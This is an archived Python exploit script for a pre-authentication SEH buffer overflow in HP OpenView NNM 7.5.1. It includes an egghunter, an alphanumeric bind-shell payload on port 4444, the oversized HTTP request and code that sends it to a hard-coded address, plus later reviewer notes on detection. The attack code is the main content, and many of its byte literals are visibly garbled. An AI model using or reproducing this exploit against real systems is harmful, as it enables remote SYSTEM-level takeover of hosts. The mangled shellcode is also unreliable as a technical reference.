
# Title : HP OpenView NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit
# Published : 2008-04-02
# Author : muts


#!/usr/bin/python
################################################################################
# HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow
# Tested on Windows 2003 Server SP1.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/hp-nnm-ov.py.txt
# [shameless plug]
# This vulnerability was found, analysed and exploited
# as part of a training module in "BackTrack to the Max".
# http://www.offensive-security.com/ilt.php
# [/shameless plug]
#################################################################################
# bt 0day# python hp-nnm-ov.py
# [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil HTTP request to NNMz, ph33r
# [*] Egghunter working ...
# [*] Check payload results - may take up to a minute.
# bt 0day# nc -v 192.168.1.111 4444
# (muts) [192.168.1.111] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:>whoami
# whoami
# nt authoritysystem
#
# C:>
#
################################################################################
# Insane, "We own all those registers, but how the heck do we get EIP" method.
################################################################################
# crash = "T"*1300
#
#################################################################################
# Funky, "Let's make the stack happy and pray for EIP" overwrite method.
#################################################################################
# Case  1 - Stack not happy:
# crash = "T"*989
#
# Case 2 - Stack happy, we own EIP - blessed by the angels above:
# 0x44442638 - Happy NNM address
# crash = "T"*941 +"x38x26x44x44"+"x42x42x42x42" +"T"*12 +"x41x41x41x41" + "T"*24+":7510"+"x41x41x41x41" + "B"*24+":7510"
# 12 bytes of nasty strict alphanum shellcode possibility @EBP
#
################################################################################
# Unknown "wtf, these bytes are expanding" SEH method:
################################################################################
# 0x6d356c6e - POP POP RET somewhere in NNM
# crash = "xeb"*1100+"A"*9+"x41x41x41x41"+"A"*1900+":7510"
#
################################################################################
# Final exploit crash SEH method:
################################################################################
# crash = "xeb"*1101 +"x41x41x41x41x77x21x6ex6cx35x6d" + "G"*32 + egghunter +"A"*100+":7510"
#
################################################################################

import socket
import os
import sys

# Review notes (defender's view of what this script does, as written):
#   * It builds ONE HTTP GET request whose absolute-URI "host" segment is a
#     string several kilobytes long (evilcrash, below) and sends it, with no
#     credentials, to TCP port 7510 of a hard-coded address, then closes the
#     socket without reading any reply.
#   * Observable features of that request, all visible in the lines below:
#     an absolute URI "GET http://<long run of repeated bytes>:7510/topology/homeBaseView",
#     a "Content-Length: 1048580" header whose value is far larger than the
#     body actually sent (bindshell only), and a Java-style User-Agent.  Those
#     are the natural things to alert on at a proxy/IDS in front of the NNM
#     web port, and an input-length limit on the URL/Host is the obvious
#     server-side guard.
#   * Success is never verified here; the author's transcript in the file
#     header shows the effect as a new listener on TCP/4444 on the target,
#     which is the host-side indicator to look for.
#   * NOTE(review): many string literals in this archived copy look
#     mis-transcribed (e.g. "x41" as three plain characters); as written the
#     script sends plain ASCII, so any sizes quoted in these notes describe
#     this copy only.
print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)"
print "[*] http://www.offensive-security.com"

# Alphanumeric egghunter shellcode + restricted chars x40x3fx3ax2f - ph33r
# One egg to rule them all.
# Per the author's comment this is an "egghunter"; presumably it searches for
# the 8-byte tag "T00WT00W" that prefixes `bindshell` below -- confirm against
# the original payload.  It is embedded in the URL (see evilcrash), not in the
# request body.

egghunter=(
"%JMNU%521*TX-1MUU-1KUU-5QUUPAA%J"
"MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5"
"21*-q!au-q!au-oGSePAA%JMNU%521*-D"
"A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1"
"z1E-oRHEPAA%JMNU%521*-3s1--331--^"
"TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA"
"A%JMNU%521*-R222-1111-nZJ2PAA%JMN"
"U%521*-1-wD-1-wD-8$GwP")

# Stub the author prepends to the payload (see bindshell).
# NOTE(review): as transcribed this is 111 plain ASCII characters
# (34 x "x90" + "x83xc4x03").
alignstack="x90"*34+"x83xc4x03"

# win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
# Spawned shell dies quickly as a result of a parent thread killing it.
# Best shellcodes are of the "instant" type, such as adduser, etc.
# Per the author's note: a Metasploit-generated, alphanumeric-encoded bind
# shell on TCP/4444, prefixed with the "T00WT00W" tag and alignstack.  It is
# sent as the HTTP body (see buffer below).  Defender's note: an unexpected
# listener on TCP/4444 on the NNM host, as in the header transcript, is the
# host-side sign this payload ran.

bindshell=("T00WT00W" + alignstack +
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"
"x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48"
"x4ex46x46x32x46x42x4bx48x45x54x4ex33x4bx38x4ex37"
"x45x30x4ax37x41x30x4fx4ex4bx38x4fx54x4ax41x4bx48"
"x4fx35x42x32x41x50x4bx4ex49x34x4bx58x46x43x4bx58"
"x41x30x50x4ex41x33x42x4cx49x49x4ex4ax46x48x42x4c"
"x46x47x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x4ax32x45x37x45x4ex4bx48"
"x4fx35x46x52x41x30x4bx4ex48x46x4bx58x4ex30x4bx54"
"x4bx58x4fx35x4ex51x41x50x4bx4ex43x50x4ex32x4bx38"
"x49x58x4ex46x46x52x4ex31x41x56x43x4cx41x53x4bx4d"
"x46x46x4bx58x43x44x42x33x4bx38x42x54x4ex30x4bx48"
"x42x47x4ex51x4dx4ax4bx48x42x34x4ax50x50x35x4ax36"
"x50x38x50x54x50x50x4ex4ex42x35x4fx4fx48x4dx48x56"
"x43x55x48x56x4ax46x43x53x44x43x4ax36x47x57x43x57"
"x44x33x4fx35x46x55x4fx4fx42x4dx4ax56x4bx4cx4dx4e"
"x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx45x49x38x45x4e"
"x48x56x41x38x4dx4ex4ax50x44x30x45x45x4cx46x44x30"
"x4fx4fx42x4dx4ax46x49x4dx49x50x45x4fx4dx4ax47x55"
"x4fx4fx48x4dx43x55x43x55x43x55x43x55x43x45x43x44"
"x43x35x43x54x43x55x4fx4fx42x4dx48x36x4ax46x41x31"
"x4ex55x48x46x43x55x49x58x41x4ex45x59x4ax56x46x4a"
"x4cx51x42x37x47x4cx47x35x4fx4fx48x4dx4cx56x42x51"
"x41x35x45x45x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x32"
"x49x4ex47x35x4fx4fx48x4dx43x35x45x35x4fx4fx42x4d"
"x4ax56x45x4ex49x34x48x48x49x44x47x45x4fx4fx48x4d"
"x42x55x46x55x46x35x45x45x4fx4fx42x4dx43x59x4ax46"
"x47x4ex49x57x48x4cx49x37x47x55x4fx4fx48x4dx45x45"
"x4fx4fx42x4dx48x56x4cx56x46x56x48x46x4ax46x43x56"
"x4dx36x49x58x45x4ex4cx56x42x45x49x45x49x42x4ex4c"
"x49x38x47x4ex4cx36x46x44x49x38x44x4ex41x33x42x4c"
"x43x4fx4cx4ax50x4fx44x54x4dx52x50x4fx44x44x4ex32"
"x43x39x4dx38x4cx37x4ax43x4bx4ax4bx4ax4bx4ax4ax46"
"x44x57x50x4fx43x4bx48x41x4fx4fx45x57x46x44x4fx4f"
"x48x4dx4bx35x47x45x44x55x41x55x41x55x41x35x4cx56"
"x41x50x41x55x41x45x45x35x41x45x4fx4fx42x4dx4ax56"
"x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx36"
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx38x47x55x4ex4f"
"x43x48x46x4cx46x56x4fx4fx48x4dx44x55x4fx4fx42x4d"
"x4ax56x4fx4ex50x4cx42x4ex42x56x43x35x4fx4fx48x4d"
"x4fx4fx42x4dx5a")

# 0x6d356c6e POP POP RET somewhere in NNM 7.5.1
# The URL "host" segment: 1101 copies of "xeb", ten more 3-character
# fragments (the author's SEH record; the bytes of 0x6d356c6e appear in
# little-endian order as "6e","6c","35","6d"), 32 x "G", the egghunter,
# 100 x "A", then the port suffix ":7510".  Per the header notes this is the
# segment that triggers the SEH overwrite; its length is what a bound on the
# accepted URL/Host size would reject.

evilcrash = "xeb"*1101 + "x41x41x41x41x77x21x6ex6cx35x6d" + "G"*32 +egghunter + "A"*100 + ":7510"

# Full request: an absolute-URI GET carrying the oversized host segment, a
# declared Content-Length (1048580) far larger than the body that follows
# (bindshell only), and the author-supplied Java-style User-Agent.  That
# header/body mismatch is itself a usable detection feature.
buffer="GET http://" + evilcrash+ "/topology/homeBaseView HTTP/1.1rn"
buffer+="Content-Type: application/x-www-form-urlencodedrn"
buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03rn"
buffer+="Content-Length: 1048580rnrn"
buffer+= bindshell 

print "[*] Sending evil HTTP request to NNMz, ph33r"
# Delivery: a single TCP connection to the hard-coded address on port 7510.
# No timeout, no error handling and no read of the response; a refused or
# reset connection simply raises from connect()/send().
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("192.168.1.111", 7510))
expl.send(buffer)
expl.close()
# These messages are unconditional; nothing above checks whether the request
# was accepted or whether the payload ran.
print "[*] Egghunter working ..."
print "[*] Check payload results - may take up to a minute."
